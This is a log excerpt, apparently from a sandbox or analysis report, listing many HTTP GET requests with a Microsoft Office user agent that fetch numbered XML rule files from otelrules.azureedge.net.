Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
